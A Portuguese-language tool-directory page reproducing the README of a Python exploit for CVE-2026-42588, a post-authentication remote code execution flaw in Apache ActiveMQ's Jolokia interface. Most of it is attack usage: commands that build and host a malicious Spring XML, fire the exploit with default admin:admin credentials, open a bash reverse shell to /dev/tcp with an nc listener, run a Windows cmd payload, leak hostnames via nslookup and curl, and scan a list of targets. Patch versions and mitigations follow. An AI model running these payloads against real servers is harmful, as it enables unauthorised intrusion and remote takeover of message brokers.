Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42588 — Exploit RCE baseado em Python para CVE-2026-42588 visando Apache ActiveMQ Jolokia. Apresenta modo somente verificação, geração de XML malicioso e suporte para reverse shell, OOB e verificação baseada em arquivo. | Kitploit
Ferramentas/GitHubGitHub/hnytgl/cve-2026-42588
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubhnytgl/cve-2026-42588

CVE-2026-42588

Exploit RCE baseado em Python para CVE-2026-42588 visando Apache ActiveMQ Jolokia. Apresenta modo somente verificação, geração de XML malicioso e suporte para reverse shell, OOB e verificação baseada em arquivo.

Ver Repositório
32há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42588 - Exploração de Execução Remota de Código no Apache ActiveMQ Jolokia

Nível de gravidade: 🔴 Alto (CVSS 4.0: 8.1)
Tipo de vulnerabilidade: CWE-94 — Injeção de código
Versões afetadas: Apache ActiveMQ < 5.19.7 / 6.0.0 ≤ versão < 6.2.6
Pré-requisito de exploração: Necessita de credenciais de autenticação do Web Console (padrão admin:admin)


📋 Índice

  • Visão geral da vulnerabilidade
  • Princípio da vulnerabilidade
  • Versões afetadas
  • Condições de exploração
  • Descrição dos arquivos
  • Início rápido
  • Modo de uso detalhado
  • Panorama da cadeia de exploração
  • Verificação do sucesso da exploração
  • Solução de correção
  • Medidas de mitigação temporárias
  • FAQ
  • Aviso de isenção de responsabilidade
  • Links de referência

  • Visão geral da vulnerabilidade

    CVE-2026-42588 é uma vulnerabilidade de execução remota de código (RCE) pós-autenticação existente no Apache ActiveMQ.

    Um atacante, de posse de credenciais de autenticação do Web Console, pode invocar o método BrokerService.addNetworkConnector(String) através da interface de ponte Jolokia JMX-HTTP (/api/jolokia/), fornecendo uma URI masterslave:// cuidadosamente construída, utilizando o protocolo xbean: para carregar um arquivo de configuração Spring XML remoto, resultando na execução de comandos arbitrários do sistema na JVM do ActiveMQ Broker.


    Princípio da vulnerabilidade

    Cadeia de exploração

    root@kitploit:~
    /api/jolokia/ (Ponte JMX-HTTP Jolokia)
           │
           ▼
    BrokerService.addNetworkConnector(String)
           │
           ▼
    masterslave://?brokerConfig=xbean:http://atacante/malicioso.xml
           │
           ▼
    XBeanBrokerFactory → ResourceXmlApplicationContext
           │
           ▼
    Pré-instanciação de todos os beans singleton do Spring → Aciona Runtime.exec() / ProcessBuilder
           │
           ▼
    🚨 Execução remota de código (RCE)
    

    Pontos técnicos principais

    EtapaDescrição
    Superfície de exposição JolokiaO Web Console do ActiveMQ expõe por padrão /api/jolokia/, permitindo a execução da operação exec nos MBeans org.apache.activemq:*
    Método perigosoBrokerService.addNetworkConnector(String) recebe uma URI de discovery e a processa
    Cadeia de acionamento por URIO parâmetro brokerConfig do protocolo masterslave:// é controlável, combinado com o scheme xbean: para acionar o carregamento do contexto Spring
    Ponto de acionamento RCEO XBeanBrokerFactory utiliza ResourceXmlApplicationContext para carregar um XML remoto; o Spring instancia todos os beans singleton antes mesmo da validação da configuração

    Versões afetadas

    Faixa de versãoStatus
    Apache ActiveMQ < 5.19.7❌ Afetado
    6.0.0 ≤ Apache ActiveMQ < 6.2.6❌ Afetado
    Apache ActiveMQ ≥ 5.19.7✅ Corrigido
    Apache ActiveMQ ≥ 6.2.6✅ Corrigido

    Condições de exploração

    1. ✅ Acessibilidade de rede — A interface /api/jolokia/ deve estar acessível ao atacante (porta padrão 8161)
    2. ✅ Credenciais válidas — Possuir credenciais de autenticação do Web Console do ActiveMQ (padrão admin:admin)
    3. ✅ Serviço HTTP do atacante — Necessário um servidor HTTP acessível pelo alvo para hospedar o arquivo XML malicioso

    Descrição dos arquivos

    root@kitploit:~
    .
    ├── CVE-2026-42588_EXP.py   # Script de exploração (principal)
    ├── malicious.xml            # Modelo de XML Spring malicioso
    ├── requirements.txt         # Dependências Python
    └── README.md                # Este arquivo
    
    ArquivoFinalidade
    CVE-2026-42588_EXP.pyScript de exploração em Python, suporta modo de detecção (--check-only) e modo de geração de XML (--gen-xml)
    malicious.xmlModelo de configuração Spring XML malicioso, contém dois métodos de exploração: Runtime.exec() e ProcessBuilder

    Início rápido

    1. Instalar dependências

    root@kitploit:~
    pip install -r requirements.txt
    

    2. Gerar arquivo XML malicioso

    root@kitploit:~
    python CVE-2026-42588_EXP.py --gen-xml -c "touch /tmp/activemq_pwned" > malicious.xml
    

    3. Hospedar arquivo XML malicioso

    Inicie um serviço HTTP na máquina atacante:

    root@kitploit:~
    python3 -m http.server 8080
    

    4. Executar a exploração

    root@kitploit:~
    # Usando credenciais padrão admin/admin
    python CVE-2026-42588_EXP.py \
        -u http://192.168.1.100:8161 \
        -x http://seu-ip-atacante:8080/malicious.xml
    
    # Usando credenciais personalizadas
    python CVE-2026-42588_EXP.py \
        -u http://alvo:8161 \
        -U meuusuario \
        -P minhasenha \
        -x http://seu-ip-atacante:8080/malicious.xml
    

    5. (Opcional) Apenas detectar a vulnerabilidade

    root@kitploit:~
    python CVE-2026-42588_EXP.py -u http://192.168.1.100:8161 --check-only
    

    Modo de uso detalhado

    Parâmetros da linha de comando

    root@kitploit:~
    usage: CVE-2026-42588_EXP.py [-h] [-u URL] [-U USERNAME] [-P PASSWORD]
                                 [-x XML_URL] [--check-only] [--gen-xml]
                                 [-c COMMAND] [--timeout TIMEOUT] [--no-verify]
    
    Opções:
      -u, --url         URL do ActiveMQ alvo (ex: http://192.168.1.100:8161)
      -U, --username    Nome de usuário do Web Console (padrão: admin)
      -P, --password    Senha do Web Console (padrão: admin)
      -x, --xml-url     URL remota do arquivo Spring XML malicioso
      --check-only      Apenas verificar se a interface Jolokia está acessível
      --gen-xml         Gerar arquivo XML malicioso e enviar para stdout
      -c, --command     Comando a ser executado no alvo (padrão: touch /tmp/activemq_pwned)
      --timeout         Tempo limite em segundos para requisições HTTP (padrão: 30)
      --no-verify       Desabilitar verificação de certificado SSL
    

    Cenário 1: Reverse Shell

    1. Gerar XML malicioso na máquina atacante:

    root@kitploit:~
    python CVE-2026-42588_EXP.py --gen-xml \
        -c "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'" \
        > reverse_shell.xml
    

    2. Hospedar XML e iniciar listener:

    root@kitploit:~
    # Terminal 1: Serviço HTTP
    python3 -m http.server 8080
    
    # Terminal 2: Listener nc
    nc -lvnp 4444
    

    3. Acionar a vulnerabilidade:

    root@kitploit:~
    python CVE-2026-42588_EXP.py \
        -u http://alvo:8161 \
        -x http://10.0.0.1:8080/reverse_shell.xml
    

    Cenário 2: Execução de comando CMD (alvo Windows)

    1. Gerar XML malicioso para Windows:

    Modifique o comando do ProcessBuilder em malicious.xml para:

    root@kitploit:~
    <bean class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>cmd.exe</value>
                <value>/c</value>
                <value>whoami &gt; C:\windows\temp\pwned.txt</value>
            </list>
        </constructor-arg>
    </bean>
    

    2. Hospedar e executar:

    root@kitploit:~
    python CVE-2026-42588_EXP.py \
        -u http://windows-alvo:8161 \
        -x http://atacante:8080/malicious_win.xml
    

    Cenário 3: Apenas detecção de vulnerabilidade

    root@kitploit:~
    # Detecção em lote
    for ip in $(cat targets.txt); do
        echo "=== Testando $ip ==="
        python CVE-2026-42588_EXP.py -u "http://$ip:8161" --check-only --timeout 5
    done
    

    Panorama da cadeia de exploração

    root@kitploit:~
    ┌─────────────────────────────────────────────────────────────────────────────┐
    │                        Cadeia de ataque CVE-2026-42588                          │
    ├─────────────────────────────────────────────────────────────────────────────┤
    │                                                                              │
    │  ① Atacante                             ⑤ ActiveMQ Broker (JVM)              │
    │  ┌──────────┐                         ┌────────────────────────────────┐   │
    │  │ Script   │──── ② HTTP POST ───────▶│ /api/jolokia/                  │   │
    │  │ EXP      │    Jolokia exec()        │                                │   │
    │  │          │    Basic Auth            │ BrokerService.                 │   │
    │  │          │                          │ addNetworkConnector(           │   │
    │  │          │                          │   "masterslave://?             │   │
    │  │          │                          │    brokerConfig=               │   │
    │  │          │                          │    xbean:http://...            │   │
    │  │          │                          │    /malicious.xml"             │   │
    │  └──────────┘                          │ )                              │   │
    │       │                                └────────┬───────────────────────┘   │
    │       │                                         │                           │
    │       │          ③ HTTP GET                     ▼                           │
    │       │  ┌──────────────────────┐  ┌────────────────────────────────┐      │
    │       └─▶│ Servidor HTTP        │  │ ResourceXmlApplication         │      │
    │          │ do atacante          │  │ Context carrega XML remoto      │      │
    │          │ (python http.server) │  │                                │      │
    │          │                      │  │ Pr�-instanciação de Beans      │      │
    │          │ malicious.xml        │  │ do Spring ──▶                   │      │
    │          └──────────────────────┘  │ Runtime.exec() /                │      │
    │                                    │ ProcessBuilder.start()          │      │
    │                                    │          │                      │      │
    │                                    │          ▼                      │      │
    │                                    │    🚨 RCE bem-sucedido 🚨       │      │
    │                                    └────────────────────────────────┘      │
    │                                                                              │
    └─────────────────────────────────────────────────────────────────────────────┘
    

    Verificação do sucesso da exploração

    Como a execução do comando ocorre durante a fase de parsing do XML Spring, ela é assíncrona, e a resposta HTTP pode não refletir diretamente o resultado da execução. Recomenda-se verificar das seguintes formas:

    Método 1: Reverse Shell (mais confiável)

    root@kitploit:~
    # Máquina atacante
    nc -lvnp 4444
    

    Método 2: Exfiltração DNS (OOB)

    root@kitploit:~
    # Usar nslookup ou curl no comando para retorno
    nslookup $(hostname).seu-servidor-dns.com
    

    Método 3: Verificação de arquivo no alvo

    root@kitploit:~
    # Verificar arquivo de flag no alvo
    ls -la /tmp/activemq_pwned
    

    Método 4: Conexão reversa HTTP

    root@kitploit:~
    # No XML malicioso usar
    curl http://seu-servidor:8888/$(hostname)
    # Enquanto isso, no atacante ouvir
    nc -lvnp 8888
    

    Solução de correção

    ✅ Solução recomendada: Atualizar versão

    Linha de versãoAtualizar para
    Série 5.x5.19.7 ou superior
    Série 6.x6.2.6 ou superior

    Download: https://activemq.apache.org/download

    Comunicado de correção: https://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm


    Medidas de mitigação temporárias

    Se não for possível atualizar imediatamente, as seguintes medidas podem reduzir o risco:

    1. Restringir o acesso à interface Jolokia

    No conf/jetty.xml, restrinja /api/jolokia/ para acesso apenas local, ou utilize firewall/proxy reverso com lista de permissão de IPs.

    2. Modificar a política de acesso do Jolokia

    Edite conf/jolokia-access.xml, proibindo a operação exec nos MBeans org.apache.activemq:*:

    root@kitploit:~
    <restrict>
        <mbean>
            <name>org.apache.activemq:*</name>
            <operation>!exec</operation>
        </mbean>
    </restrict>
    

    3. Alterar credenciais padrão

    Edite conf/jetty-realm.properties, alterando o padrão admin: admin, admin para uma senha forte.

    4. Desabilitar o Web Console (se não for necessário)

    No conf/jetty.xml, comente a configuração do Context relacionada ao Web Console.


    FAQ

    P: Essa vulnerabilidade requer autenticação?

    R: Sim, requer credenciais válidas do Web Console do ActiveMQ. No entanto, as credenciais padrão são admin/admin, e muitos sistemas reais não alteram a senha padrão, tornando o risco ainda alto.

    P: Após execução do EXP, não há retorno. O que fazer?

    R: Isso é normal. A execução do comando é assíncrona, ocorrendo durante a fase de parsing do XML Spring. Recomenda-se usar reverse shell, exfiltração DNS, etc. para verificação. Consulte Verificação do sucesso da exploração.

    P: Funciona em alvos Windows?

    R: Sim. É necessário alterar o comando em malicious.xml de /bin/sh -c para cmd.exe /c, ajustando a sintaxe para o estilo Windows.

    P: O modo de detecção (--check-only) pode confirmar a presença da vulnerabilidade?

    R: O modo de detecção apenas confirma se a interface Jolokia está acessível (condição necessária para exploração). Interface acessível não garante que seja explorável, mas indica possibilidade.

    P: A vulnerabilidade ainda pode ser explorada após a correção?

    R: Não. Após atualizar para 5.19.7+ ou 6.2.6+, a lógica de parsing do parâmetro brokerConfig foi corrigida e não aceita mais o scheme xbean:.


    Aviso de isenção de responsabilidade

    ⚠️ Esta ferramenta é apenas para pesquisa de segurança e testes autorizados!

    • Usar esta ferramenta para acessar sistemas não autorizados é ilegal
    • O usuário assume total responsabilidade por todas as consequências e responsabilidades decorrentes do uso desta ferramenta
    • O autor não se responsabiliza por qualquer uso não autorizado, abuso ou danos resultantes
    • Use esta ferramenta apenas em seus próprios sistemas ou em sistemas com autorização por escrito
    • Cumpra as leis locais e os padrões éticos profissionais

    Links de referência

    FonteLink
    Banco de dados de vulnerabilidades (CVE Detail)https://www.cybersecurity-help.cz/vdb/vulns/133395/
    Comunicado de vulnerabilidade da Antiyhttps://bbs.antiy.cn/thread-210844-1-1.html
    Detalhes da vulnerabilidade DDPOChttps://ddpoc.com/DVB-2026-11290.html
    Site oficial do Apache ActiveMQhttps://activemq.apache.org/
    Comunicado de segurança da Apachehttps://lists.apache.org/thread/ns0zktfo16s9ql2mmtqtlb6p6xcs45xm

    CVE-2026-42588 — Apenas para fins educacionais e testes autorizados

    Baixar ferramenta